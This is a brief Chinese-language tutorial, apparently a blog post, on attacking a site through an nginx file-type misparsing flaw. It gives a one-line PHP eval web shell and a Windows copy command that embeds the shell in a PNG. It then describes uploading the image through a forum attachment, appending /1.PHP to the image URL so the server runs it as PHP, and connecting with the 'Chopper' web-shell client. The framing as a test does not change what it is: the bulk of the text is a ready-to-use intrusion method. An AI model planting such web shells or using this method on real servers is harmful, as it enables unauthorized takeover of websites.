|
关于nginx文件类型错误解析可参看我的上一篇文章
已知测试系统存在nginx文件类型错误解析漏洞,我们要找的就是一个图片上传点。
于是我们找一个回帖处的上传附件,这里先介绍一下制作木马图片
图片任取一张(有时不同格式的图片,可能运行有差异,jpg、png、gif都可以试试)
至于一句话木马,网上各种变异也很多,这里由于是测试,我们简单使用
<?php @eval($_POST['chopper']);?>
在windows环境下,使用命令
copy upload.png/b+shell.php/a shell.png
生成图片木马
上传成功后,找到图片地址在后面加上/1.PHP
这是图片已被作为PHP文件进行解析
最后祭上菜刀
| 
转播
